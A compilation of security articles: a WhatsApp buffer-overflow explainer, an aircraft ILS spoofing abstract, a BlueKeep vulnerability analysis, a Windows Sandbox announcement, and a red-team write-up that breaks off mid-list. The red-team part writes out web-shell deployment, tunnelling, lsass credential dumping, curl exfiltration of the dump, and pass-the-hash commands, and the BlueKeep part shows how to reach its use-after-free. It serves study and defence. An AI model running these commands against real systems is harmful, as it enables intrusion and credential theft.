5. How WhatsApp was Hacked by Exploiting a Buffer Overflow Security Flaw


    WhatsApp has been in the news lately following the discovery of a buffer overflow flaw. Read on to experience just how it happened and try out hacking one yourself.

WhatsApp entered the news early last week following the discovery of an alarming targeted security attack, according to the Financial Times. WhatsApp, famously acquired by Facebook for $19 billion in 2014, is the world's most popular messaging app, with 1.5 billion monthly users from 180 countries, and has always prided itself on being secure. Below, we'll explain what went wrong technically, and teach you how you could hack a similar memory corruption vulnerability.

    First, what’s up with WhatsApp security?

    WhatsApp has been a popular communication platform for human rights activists and other groups seeking privacy from government surveillance due to the company’s early stance on providing strong end-to-end encryption for all of its users. This means, in theory, that only the WhatsApp users involved in a chat are able to decrypt those communications, even if someone were to hack into the systems running at WhatsApp Inc. (a property called forward secrecy). An independent audit by academics in the UK and Canada found no major design flaws in the underlying Signal Messaging Protocol deployed by WhatsApp. We suspect that the company’s security eminence and focus on baking in privacy comes from the strong security mindset of WhatsApp founder Jan Koum who grew up as a hacker in the w00w00 hacker clan in the 1990s.

    But WhatsApp was then used for … surveillance?

    WhatsApp’s reputation as a secure messaging app and its popularity amongst activists made the report of a 3rd party company stealthily offering turn-key targeted surveillance against WhatsApp’s Android and iPhone users all the more disconcerting. The company in question, the notorious and secretive Israeli company the NSO Group, is likely an offshoot of Unit 8200 that was allegedly responsible for the Stuxnet cyberattack against the Iranian nuclear enrichment program, and has recently been under fire for licensing its advanced Pegasus spyware to foreign governments, and allegedly aiding the Saudi regime spy on the journalist Jamal Khashoggi. The severe accusations prompted the NSO co-founder and CEO to give a rare interview with 60 Minutes about the company and its policies. Facebook is now considering legal options against NSO. The initial fear was that the end-to-end encryption of WhatsApp had been broken, but this turned out not to be the case.

    So what went wrong?

    Instead of attacking the encryption protocols used by WhatsApp, the NSO Group attacked the mobile application code itself. Following the adage that the chain is never stronger than its weakest link, reasonable attackers avoid spending resources on decrypting communications of their target if they could instead simply hack the device and grab the private encryption keys themselves. In fact, hacking an endpoint device reveals all the chats and dialogs of the target and provides a perfect vantage point for surveillance. This strategy is well known: already in 2014, the exiled NSA whistleblower Edward Snowden hinted at the tactic of governments hacking endpoints rather than focusing on the encrypted messages.

    According to a brief security advisory issued by Facebook, the attack against WhatsApp was a previously unknown (0-day) vulnerability in the mobile app. A malicious user could initiate a phone call against any WhatsApp user logged into the system. A few days after the Financial Times broke the news of the WhatsApp security breach, researchers at CheckPoint reverse engineered the security patch issued by Facebook to narrow down what code might have contained the vulnerability. Their best guess is that the WhatsApp application code contained what’s called a buffer overflow memory corruption vulnerability due to insufficient checking of length of data.

    I’ve heard the term buffer overflow. But I don’t really know what it is.

To explain buffer overflows, it helps to think about how the C and C++ programming languages approach memory. Unlike most modern programming languages, where the memory for objects is allocated and released as needed, a C/C++ program sees the world as a continuum of 1-byte memory cells. Let's imagine this memory as a vast row of boxes, labeled sequentially from 0.


    Suppose some program, through dynamic memory allocation, opts to store the name of the current user (“mom”) as the three characters “m”, “o” and “m” in boxes 17000 to 17002. But other data might live in boxes 17003 and onwards.


    A crucial design decision in C and C++ is that it is entirely the responsibility of the programmer that data winds up in the correct memory cells -- the right set of boxes. Thus if the programmer accidentally puts some part of “mom” inside box 17003, neither the compiler nor the runtime will complain. Perhaps they typed in “mommy”. The program will happily place the extra two characters into boxes 17003 and 17004 without any advance warning, overwriting whatever other potentially important data lives there.
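Python normally bounds-checks every access, but we can mimic the box model with a flat bytearray to watch the corruption happen; a toy sketch:

    memory = bytearray(32)
    memory[3:8] = b"OTHER"          # unrelated data living in boxes 3-7

    def store_name(name):
        memory[0:len(name)] = name  # the "name" field is boxes 0-2, unchecked

    store_name(b"mom")              # fits exactly
    store_name(b"mommy")            # spills into boxes 3 and 4
    print(memory[3:8])              # b'myHER' -> neighbouring data is clobbered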


    But how does this relate to security?

Of course, if whatever memory corruption bug the programmer introduced always puts the data erroneously into the extra two boxes 17003 and 17004, with the control flow of the program always impacted, then it's highly likely that the programmer discovered their mistake when testing the program -- the program is bound to fail each time, after all. But when problems arise only in response to certain unusual inputs, the issues are far more likely to have escaped detection and persisted in the code base.

    Where such overwriting behavior gets interesting for hackers is when the data in box 17003 is of material importance for the program to figure out how the program should continue to run. The formal word is that the overwritten data might affect the control flow of the application. For example, what if boxes 17003 and 17004 contain information about what function in the program should be called when the user logs in? (In C, this might be represented by a function pointer; in C++, this might be a class member function). Suddenly, the path of the program execution can be influenced by the user. It’s like you could tell somebody else’s program, “Hey, you should do X, Y and Z”, and it will abide. If you were the hacker, what would you do with that opportunity? Think about it for a second. What would you do?

    I would … tell the program to .. take over the computer?

    You would likely choose to steer the program into a place that would let you get further access, so that you could do some more interactive hacking. Perhaps you could make it somehow run code that would provide remote access to the computer (or phone) on which the program is running. This choice of a payload is the craft of writing a shellcode (code that boots up a remote UNIX shell interface for the hacker, get it?)

    Two key ideas make such attacks possible. The first is that in the view of a computer, there is no fundamental difference between data and code. Both are represented as a series of bits. Thus it may be possible to inject data into the program, say instead of the string “mommy”, that would then be viewed and executed as code! This is indeed how buffer overflows were first exploited by hackers, first hypothetically in 1972 and then practically by MIT’s Robert T. Morris’s Morris worm that swept the internet in 1988 and Aleph One’s 1996 Smashing the Stack for Fun and Profit article in the underground hacker magazine Phrack.

The second idea, which crystallized after a series of defenses made it difficult to execute data introduced by an attacker as code, is to direct the program to execute a sequence of instructions already contained within the program, in a chosen order, without directly introducing any new instructions. It can be imagined as a ransom note composed of letter cutouts from newspapers, without the author needing to provide any handwriting.


    Such methods of code-reuse attacks, the most prominent being return-oriented programming (ROP), are the state-of-the-art in binary exploitation and the reason why buffer overflows are still a recurring security problem. Among the reported vulnerabilities in the CVE repository, buffer overflows and related memory corruption vulnerabilities still accounted for 14% of the nearly 19,000 vulnerabilities reported in 2018.


    Ahh… but what happened with WhatsApp?

    What the researchers at CheckPoint found by dissecting the WhatsApp security patch were the following highlighted changes to the machine code in the Android app. The code is in the real-time video transmission part of the program, specifically code that pertains to the exchange of information of how well the video of a video call is being received (the RTP Control Protocol (RTCP) feedback channel for the Real-time Transmission Protocol).

[Figure: the highlighted changes to the machine code of the Android app; image credit: CheckPoint Research]

The odd choices of variable names and structure are artifacts of the reverse engineering process: the source code for the protocol is proprietary. The C++ code might be a heavily modified version of the open-source PJSIP routine that tries to assemble a response signaling a picture loss (PLI) (code is illustrative):

int length_argument = ...; /* taken from the incoming RTCP packet */
    qmemcpy( &outgoing_rtcp_payload[ offset ], incoming_rtcp_packet, length_argument );
    /* Continue building RTCP PLI packet and send */
    

But if the remaining size of the payload buffer (after offset) is less than length_argument, a number supplied by the hacker, information from the incoming packet will be shamelessly copied by memcpy over whatever data surrounds outgoing_rtcp_payload! Just like the buffer overflow situation before, the overwritten data could include data that later directs the control flow of the program, like an overwritten function pointer.
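The missing invariant is easy to state; here is the bounds check such a copy must perform, sketched in Python (a restatement of the principle, not the actual patched code):

    def safe_copy(outgoing, offset, incoming, length):
        # never trust a length taken from the packet itself
        if length > len(outgoing) - offset:
            raise ValueError("declared length exceeds remaining buffer space")
        outgoing[offset:offset + length] = incoming[:length]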

    In summary (coupled with speculation), a hacker would initiate a video call against an unsuspecting WhatsApp user. As the video channel is being set up, the hacker manipulates the video frames being sent to the victim to force the RTCP code in their app to signal a picture loss (PLI), but only after specially crafting the sent frame so that the lengths in the incoming packet will cause the net size of the RTCP response payload to be exceeded. The control flow of the program is then directed towards executing malicious code to seize control of the app, install an implant on the phone, and then allow the app to continue running.

    Try it yourself?

Buffer overflows are technical flaws, and understanding them builds on an understanding of how computers execute code. Given how prevalent and important they are -- as illustrated by the WhatsApp attack -- we believe we should all better understand how such bugs are exploited, to help us avoid them in the future. In response, we have created a free online lab that puts you in the shoes of the hacker and illustrates how memory and buffer overflows work when you boil them down to their essence.

    Do you like this kind of thing? 
    Go read about how Facebook got hacked last year and try out hacking it yourself.

    Learn more about our security training platform for developers at adversary.io

     

Source: https://blog.adversary.io/whatsapp-hack/

6. Wireless Attacks on Aircraft Instrument Landing Systems

Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir (Khoury College of Computer Sciences, Northeastern University, Boston, MA, USA)

     

Abstract

Modern aircraft heavily rely on several wireless technologies for communications, control, and navigation. Researchers demonstrated vulnerabilities in many aviation systems. However, the resilience of aircraft landing systems to adversarial wireless attacks has not yet been studied in the open literature, despite their criticality and the increasing availability of low-cost software-defined radio (SDR) platforms. In this paper, we investigate the vulnerability of aircraft instrument landing systems (ILS) to wireless attacks. We show the feasibility of spoofing ILS radio signals using commercially-available SDR, causing last-minute go around decisions, and even missing the landing zone in low-visibility scenarios. We demonstrate on aviation-grade ILS receivers that it is possible to fully and in fine grain control the course deviation indicator as displayed by the ILS receiver, in real time. We analyze the potential of both an overshadowing attack and a lower-power single-tone attack. In order to evaluate the complete attack, we develop a tightly-controlled closed-loop ILS spoofer that adjusts the adversary's transmitted signals as a function of the aircraft GPS location, maintaining power and deviation consistent with the adversary's target position, causing an undetected off-runway landing. We systematically evaluate the performance of the attack against an FAA certified flight-simulator (X-Plane)'s AI-based autoland feature, and demonstrate a systematic success rate with offset touchdowns of 18 meters to over 50 meters.

     

    Download: https://aanjhan.com/assets/ils_usenix2019.pdf

7. Analysis of CVE-2019-0708 (BlueKeep)

     

I held back this write-up until a proof of concept (PoC) was publicly available, so as not to cause any harm. Now that there are multiple denial-of-service PoCs on GitHub, I'm posting my analysis.

    Binary Diffing

    As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results.

[Figure: A BinDiff of TermDD.sys pre and post patch.]

Most of the changes turned out to be pretty mundane, except for "_IcaBindVirtualChannels" and "_IcaRebindVirtualChannels". Both functions contained the same change, so I focused on the former, as binding would likely occur before rebinding.

[Figure: The original IcaBindVirtualChannels is on the left, the patched version on the right.]

New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to "MS_T120", then parameter three of _IcaBindChannel is set to 31.

Based on the fact that the change only takes place if v4+88 is "MS_T120", we can assume this condition must be true to trigger the bug. So, my first question is: what is "v4+88"?

Looking at the logic inside IcaFindChannelByName, I quickly found my answer.

[Figure: Inside IcaFindChannelByName]

    Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel, by its name.

    The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure.

    Using all of the above, I came to the conclusion that “MS_T120” is the name of a channel. Next I needed to figure out how to call this function, and how to set the channel name to MS_T120.

I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspected the channel name and call stack.

[Figure: The call stack and channel name upon the first call to IcaBindVirtualChannels]

The very first call to IcaBindVirtualChannels is for the channel I want, MS_T120. The subsequent channel names are "CTXTW   ", "rdpdr", "rdpsnd", and "drdynvc".

Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, I'd need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name.

    So my task now was to figure out how to call IcaBindVirtualChannels. In the call stack is IcaStackConnectionAccept, so the channel is likely created upon connect. Just need to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight.

WiresharkCapture.png A capture of the RDP connection sequence
ChannelArray.png The channel array, as seen by the Wireshark RDP parser

    The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need.

    Seeing as MS_T120 and CTXTW are not specified anywhere, but opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels.
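For illustration, the client's channel array is just a list of CHANNEL_DEF entries in the MCS Connect Initial PDU (per MS-RDPBCGR: an 8-byte ANSI name plus a 4-byte options field). The sketch below appends MS_T120 to the usual channels; the option flag values are illustrative, not taken from a real capture:

#include <stdint.h>

#pragma pack(push, 1)
typedef struct {
    char     name[8];     /* ANSI channel name, null-padded */
    uint32_t options;     /* CHANNEL_OPTION_* flags */
} CHANNEL_DEF;
#pragma pack(pop)

static const CHANNEL_DEF channel_array[] = {
    { "rdpdr",   0x80800000u },
    { "rdpsnd",  0xc0000000u },
    { "drdynvc", 0xc0800000u },
    { "MS_T120", 0x80800000u },  /* extra entry: binds the internal channel again */
};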

    After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test.

    VulnerableCodePath.png Breakpoint is hit after adding MS_T120 to the channel array

    Awesome! Now the vulnerable code path is hit, I just need to figure out what can be done…

    To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection.

    IcaCreateChannelCallstack.png The call stack when the IcaCreateChannel breakpoint is hit

    Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that’s not of interest.

    Below is the ICAAPI, which is the user mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user mode equivalent of IcaCreateChannel.

Because IcaChannelOpen is a generic function used for opening all channels, we'll go down another level to rdpwsx!MCSCreateDomain.

    MCSCreateDomain.png The code for rdpwsx!MCSCreateDomain

    This function is really promising for a couple of reasons: Firstly, it calls IcaChannelOpen with the hard coded name “MS_T120”. Secondly, it creates an IoCompletionPort with the returned channel handle (Completion Ports are used for asynchronous I/O).

    The variable named “CompletionPort” is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port.

    XrefsToCompletionPort.png All references to “CompletionPort”

Well, MCSInitialize is probably a good place to start; initialization code always is.

    MCSInitialize.png The code contained within MCSInitialize

    Ok, so a thread is created for the completion port, and the entrypoint is IoThreadFunc. Let’s look there.

    IoThreadFunc.png The completion port message handler

    GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it’s passed to MCSPortData.

    To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then, I sent the string “MalwareTech” to the channel.

MCSPortDataBreakpoint.png Breakpoint hit on MCSPortData once data is sent to the channel.

    So that confirms it, I can read/write to the MS_T120 channel.

    Now, let’s look at what MCSPortData does with the channel data…

    MCSPortData.png MCSPortData buffer handling code

ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function, a check is performed on channel_ptr+120 (offset 4 into the data buffer). If the dword there is set to 2, the function calls HandleDisconnectProviderIndication and MCSChannelClose.
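A minimal C sketch of that dispatch, assuming the offsets above (the called function names mirror the decompilation; everything else is illustrative):

#include <stdint.h>

static void HandleDisconnectProviderIndication(void *channel) { (void)channel; }
static void MCSChannelClose(void *channel) { (void)channel; }  /* frees the channel */

static void mcs_port_data(uint8_t *channel_ptr)
{
    /* The received buffer lives at channel_ptr+116, so channel_ptr+120
       is the second dword of the data: an action code. */
    uint32_t action = *(uint32_t *)(channel_ptr + 120);

    if (action == 2) {   /* disconnect-provider indication */
        HandleDisconnectProviderIndication(channel_ptr);
        MCSChannelClose(channel_ptr);
    }
    /* other action codes presumably handle normal channel traffic */
}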

    Well, that’s interesting. The code looks like some kind of handler to deal with channel connects/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally.

    I don’t think we’re supposed to be here…

Being a little curious, I sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn't lead to any issues, could it?

    BSOD.png Oh, no. We crashed the kernel!

    Whoops! Let’s take a look at the bugcheck to get a better idea of what happened.

    Bugcheck.png

    It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I’d already closed (leading to a double free).

    Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit. However, there is something better.

    ChannelId.png Internals of the channel cleanup code run when the connection is broken

Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound using the vulnerable IcaBindVirtualChannels code, it is bound with another ID.

    PatchAnnotated.png The difference in code pre and post patch

Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Because the channel is bound under two different IDs, we get two separate references to it.

When one reference is used to close the channel, the reference is deleted, as is the channel; however, the other reference remains (a use-after-free). With the remaining reference, it is now possible to write to kernel memory that no longer belongs to us.
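As a toy illustration of the bug class (ordinary user-mode C, nothing to do with the real kernel structures): two table slots end up holding the same pointer, and freeing through one leaves the other dangling:

#include <stdlib.h>
#include <string.h>

struct channel {
    char name[8];
};

int main(void)
{
    struct channel *table[32] = { 0 };

    /* The system binds MS_T120 internally under ID 31... */
    struct channel *ch = calloc(1, sizeof *ch);
    strcpy(ch->name, "MS_T120");
    table[31] = ch;

    /* ...and the vulnerable bind adds the same object under our ID. */
    table[5] = ch;

    /* Closing via one reference frees the object... */
    free(table[5]);
    table[5] = NULL;

    /* ...but table[31] still points at freed memory: use-after-free. */
    return 0;
}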

     

Source: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html

  9. Hari Pulapaka
     
    Microsoft
    ‎12-18-2018 04:18 PM
     
     

    Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation.

     

How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation that required a clean installation of Windows, but you didn't want to set up a virtual machine?

     

    At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary, desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state are permanently deleted.

     

    Windows Sandbox has the following properties:

    • Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD!
    • Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows
    • Disposable – nothing persists on the device; everything is discarded after you close the application
• Secure – uses hardware-based virtualization for kernel isolation, which relies on Microsoft's hypervisor to run a separate kernel that isolates Windows Sandbox from the host
    • Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU

     

    Prerequisites for using the feature

    • Windows 10 Pro or Enterprise Insider build 18305 or later
    • AMD64 architecture
    • Virtualization capabilities enabled in BIOS
    • At least 4GB of RAM (8GB recommended)
    • At least 1 GB of free disk space (SSD recommended)
    • At least 2 CPU cores (4 cores with hyperthreading recommended)

     

    Quick start

    1. Install Windows 10 Pro or Enterprise, Insider build 18305 or newer
    2. Enable virtualization:
      • If you are using a physical machine, ensure virtualization capabilities are enabled in the BIOS.
      • If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet:
      • Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true
3. Open Windows Features, and then select Windows Sandbox. Select OK to install Windows Sandbox. You might be asked to restart the computer. (A command-line alternative is sketched just after this list.)
    4. Optional Windows Features dlg.png
    5. Using the Start menu, find Windows Sandbox, run it and allow the elevation
    6. Copy an executable file from the host
    7. Paste the executable file in the window of Windows Sandbox (on the Windows desktop)
    8. Run the executable in the Windows Sandbox; if it is an installer go ahead and install it
    9. Run the application and use it as you normally do
    10. When you’re done experimenting, you can simply close the Windows Sandbox application. All sandbox content will be discarded and permanently deleted
    11. Confirm that the host does not have any of the modifications that you made in Windows Sandbox.
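As an alternative to the Windows Features dialog in step 3, the feature can also be enabled from an elevated PowerShell prompt. The feature name below ("Containers-DisposableClientVM") is the one I believe the Insider builds use; treat it as an assumption if your build differs:

Enable-WindowsOptionalFeature -Online -FeatureName "Containers-DisposableClientVM" -All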

     Windows Sandbox Screenshot - open.jpg

     

    Windows Sandbox respects the host diagnostic data settings. All other privacy settings are set to their default values.

     

    Windows Sandbox internals

    Since this is the Windows Kernel Internals blog, let’s go under the hood. Windows Sandbox builds on the technologies used within Windows Containers. Windows containers were designed to run in the cloud. We took that technology, added integration with Windows 10, and built features that make it more suitable to run on devices and laptops without requiring the full power of Windows Server.

     

    Some of the key enhancements we have made include:

     

    Dynamically generated Image

    At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements we have made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine.

     

We want to always present a clean environment, but the challenge is that some operating system files can change. Our solution is to construct what we refer to as a “dynamic base image”: an operating system image that has clean copies of the files that can change, but links to the files that cannot change in the Windows image that already exists on the host. The majority of the files are links (immutable files), which is why the image is so small (~100MB) for a full operating system. We call this instance the “base image” for Windows Sandbox, using Windows Container parlance.

     

When Windows Sandbox is not installed, we keep the dynamic base image in a compressed package which is only 25MB. Once installed, the dynamic base package occupies about 100MB of disk space.

     Dynamic Image.PNG

    Smart memory management

    Memory management is another area where we have integrated with the Windows Kernel. Microsoft’s hypervisor allows a single physical machine to be carved up into multiple virtual machines which share the same physical hardware. While that approach works well for traditional server workloads, it isn't as well suited to running devices with more limited resources. We designed Windows Sandbox in such a way that the host can reclaim memory from the Sandbox if needed.

     

Additionally, since Windows Sandbox is basically running the same operating system image as the host, we also allow Windows Sandbox to use the same physical memory pages as the host for operating system binaries, via a technology we refer to as “direct map”. In other words, the same executable pages of ntdll are mapped into the sandbox as on the host. We take care to ensure this is done in a secure manner and no secrets are shared.

     Direct Map.PNG

    Integrated kernel scheduler

    With ordinary virtual machines, Microsoft’s hypervisor controls the scheduling of the virtual processors running in the VMs. However, for Windows Sandbox we use a new technology called “integrated scheduler” which allows the host to decide when the sandbox runs. 

     

    For Windows Sandbox we employ a unique scheduling policy that allows the virtual processors of the sandbox to be scheduled in the same way as threads would be scheduled for a process. High-priority tasks on the host can preempt less important work in the sandbox. The benefit of using the integrated scheduler is that the host manages Windows Sandbox as a process rather than a virtual machine which results in a much more responsive host, similar to Linux KVM.

     

    The whole goal here is to treat the Sandbox like an app but with the security guarantees of a Virtual Machine. 

     

    Snapshot and clone

    As stated above, Windows Sandbox uses Microsoft’s hypervisor. We're essentially running another copy of Windows which needs to be booted and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time we start Windows Sandbox, we use two other technologies; “snapshot” and “clone.”

     

Snapshot allows us to boot the sandbox environment once and preserve the memory, CPU, and device state to disk. Then, when we need a new instance of Windows Sandbox, we can restore the sandbox environment from disk into memory rather than booting it. This significantly improves the start time of Windows Sandbox.

     

    Graphics virtualization

    Hardware accelerated rendering is key to a smooth and responsive user experience, especially for graphics-intense or media-heavy use cases. However, virtual machines are isolated from their hosts and unable to access advanced devices like GPUs. The role of graphics virtualization technologies, therefore, is to bridge this gap and provide hardware acceleration in virtualized environments; e.g. Microsoft RemoteFX.

     

    More recently, Microsoft has worked with our graphics ecosystem partners to integrate modern graphics virtualization capabilities directly into DirectX and WDDM, the driver model used by display drivers on Windows.

     

    At a high level, this form of graphics virtualization works as follows:

    • Apps running in a Hyper-V VM use graphics APIs as normal.
    • Graphics components in the VM, which have been enlightened to support virtualization, coordinate across the VM boundary with the host to execute graphics workloads.
    • The host allocates and schedules graphics resources among apps in the VM alongside the apps running natively. Conceptually they behave as one pool of graphics clients.

    This process is illustrated below:

     

    GPU virtualization for Sandbox - diagram.png 

     

    This enables the Windows Sandbox VM to benefit from hardware accelerated rendering, with Windows dynamically allocating graphics resources where they are needed across the host and guest. The result is improved performance and responsiveness for apps running in Windows Sandbox, as well as improved battery life for graphics-heavy use cases.

     

    To take advantage of these benefits, you’ll need a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer). Incompatible systems will render apps in Windows Sandbox with Microsoft’s CPU-based rendering technology.

     

    Battery pass-through

    Windows Sandbox is also aware of the host’s battery state, which allows it to optimize power consumption. This is critical for a technology that will be used on laptops, where not wasting battery is important to the user.

     

    Filing bugs and suggestions

    As with any new technology, there may be bugs. Please file them so that we can continually improve this feature. 

     

File bugs and suggestions at Windows Sandbox's Feedback Hub (select Add new feedback), or follow these steps:

    1. Open the Feedback Hub
    2. Select Report a problem or Suggest a feature.
    3. Fill in the Summarize your feedback and Explain in more details boxes with a detailed description of the issue or suggestion.
    4. Select an appropriate category and subcategory by using the dropdown menus. There is a dedicated option in Feedback Hub to file "Windows Sandbox" bugs and feedback. It is located under "Security and Privacy" subcategory "Windows Sandbox".
    5. Feedback Hub.png
    6. Select Next 
    7. If necessary, you can collect traces for the issue as follows: Select the Recreate my problem tile, then select Start capture, reproduce the issue, and then select Stop capture.
    8. Attach any relevant screenshots or files for the problem.
    9. Submit. 

    Conclusion

    We look forward to you using this feature and receiving your feedback!

     

    Cheers, 

    Hari Pulapaka, Margarit Chenchev, Erick Smith, & Paul Bozzay

    (Windows Sandbox team)

     

Source: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Windows-Sandbox/ba-p/301849

  10. Exploiting UN-attended Web Servers To Get Domain Admin – Red Teaming

    Note: Images used are all recreated to redact actual target information.

Recently, we conducted a remote red team assessment of a large organization and its child companies. This organization was particularly concerned about the security posture of their assets online. It was an organization with multiple child companies, as well as third-party organizations working on-premise and remotely to develop new products. The objective was to compromise the domain from their online assets.

While we want this blog to focus more on the technical side of how we compromised their network, we also want to point out a few mistakes that large organizations usually make.

TIP: It is easy to lose your way during reconnaissance when there is a huge scope and little time involved. To avoid getting lost, keep track of everything you performed, found, and identified as vulnerable in one place.

During reconnaissance, we identified a few Apache Tomcat servers (mostly v7.0.70) running in the target organization's owned range of IP addresses that seemed interesting. We sprayed a few common credentials at these web servers and successfully logged in to one of them. Later, we came to know that this server was being used by one of the child organizations for debugging applications for remote developers. Upon logging in, we learned that Tomcat was running on Windows Server 2012 R2.

Now, the easiest way to get command execution would be to upload a JSP web shell to the host server. We used a simple JSP web shell, cmd.jsp from Security Risk Advisors, to execute commands on the host server.

Since Tomcat allows deploying web apps in “war” format, we generated a .war file with `jar -cvf example.war cmd.jsp` to blend in with the default web apps. After uploading the web shell, we immediately copied the existing web shell to examples/jsp/images/somerandomname.jsp to avoid detection and obvious directory brute forcing. We then removed the previously uploaded web shell by un-deploying it.

Now that we had command execution and file upload capabilities on the host server, we began enumerating it for more information, such as user name, current user privileges, currently logged in users, host patch level, anti-malware services running on the host, host uptime, firewall rules, proxy settings, domain admins, etc. Below is the gathered information about the target machine, a Windows Server 2012 R2 virtual machine inside the target domain:

    • Newly launched
• Tomcat service running under a domain user who is also a member of the BUILTIN\Administrators group
    • Latest security patches
    • RDP enabled
    • Daily User activity
    • No SSH
• Armed with System Center Endpoint Protection and Trend Micro Deep Security.
    • SYSVOL search for credentials didn’t yield satisfactory results.

    While we had administrative privileges on the host, the web shell interactivity was very limited. The immediate goal was to gain a better foothold on the target host by following either of the methods below:

1. Drop an agent on disk that slips past a multi-layered firewall, DPI, and SOC team monitoring, and connects back to us with a shell.
2. Or use the web application server to tunnel traffic to the target host over HTTPS and reach the internal host's services, like RDP, SMB, and other web applications running on the target host (start a bind shell on the target host's localhost by dropping "nc.exe", connect to it, and get a shell).

As 1337 as it sounds, option 1 is not always the go-to, especially when there are heavy egress restrictions and obstacles and you have relatively limited time to complete an assessment. Tunnelling, on the other hand, is much quicker. While there is the caveat of additional work to get a shell, advantages like service interaction outweigh it by a large margin. To achieve tunnelling, we used “A Black Path Toward the Sun” (ABPTTS) by Ben Lincoln from NCC Group. You can find it here. Ben has done a great job describing the tool and how you can use it in situations like these; we recommend reading the manual before proceeding further.

    Following is a typical way of tunnelling via ABPTTS.

    1. Generate a server-side JSP file with default configuration with:

python abpttsfactory.py -o tomcat_walkthrough

2. Generate the war format of the JSP file:

jar -cvf tunnel.war abptts.jsp

    3. Upload war file.

4. On the attack host, set the ABPTTS client to forward the attack host's localhost traffic on port 3389 to the target host's port 3389:

python abpttsclient.py -c tomcat_walkthrough/config.txt -u <url-of-uploaded-jsp-server-file> -f 127.0.0.1:3389/127.0.0.1:3389

    5. On the attack host run:

    rdesktop 127.0.0.1

Following the steps above, we obtained internal service interaction with the target host.

    1.png

Since we had local administrator privileges, from the web shell we added a new local user on the machine and added the new user to the Administrators and Remote Desktop Users groups. Everything was straightforward from here: we could now log in as a high-privileged local user over RDP via the tunnel. While we didn't have access to the domain yet, this was already a huge win.

    2.png

Next, we used the resources at hand to gain access to the domain. A typical procedure for this is to find credentials on the network or the local system. While the SYSVOL search was a let-down, we could still extract credentials from the target host (the one compromised earlier). For this, we used Sysinternals' ProcDump to extract the memory contents of lsass.exe and feed them to mimikatz. We uploaded ProcDump to the target host and moved it to the newly created user's desktop. ProcDump requires administrator privileges to run, so we opened cmd as administrator and ran:

    procdump.exe -accepteula -ma lsass.exe lsass.dmp

Now comes the tricky part: exfiltrating the dmp file, which was well over 50MB. We used fuzzdb's list.jsp in combination with curl to exfiltrate the file from the web server. list.jsp is a directory and file viewer from fuzzdb; you can find it here. We generated a war, deployed it on the Tomcat server, navigated to where the lsass dump was, and copied the URL. Then, on the attacking host, using curl, we ran:

curl --insecure https://targethost/examples/images/jsp/list.jsp?file=c:/Users/Administrator/Contacts/lsass.dmp --output lsass.dmp

We then fed the lsass dump file to our Windows instance running mimikatz. We found 6-7 domain user NTLM hashes and one domain admin NTLM hash from a recent logon.
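For reference, replaying a ProcDump minidump through mimikatz uses its standard minidump mode (run on your own analysis box, not on the target):

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords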

    Checkmate. No unexpected twists, no drama.

    3.png

    We then used Invoke-SMBExec from here to get a shell and pass the hash by running:

    Import-Module Invoke-SMBExec.ps1

    Invoke-SMBExec -Target dc.domain.com -Domain domain.com -Username grantmepower -Hash <ntlm hash>

    When we updated the target organization about this, they asked us to end it here.

To conclude this post, we would like to advise organizations with a large internet footprint that expensive network security devices, anti-malware software, and 24/7 monitoring aren't enough to protect internal networks, especially when you leave domain member servers wide open to the internet with weak credentials and expect adversaries to knock on your front door. That said, these are the takeaways for the organization:

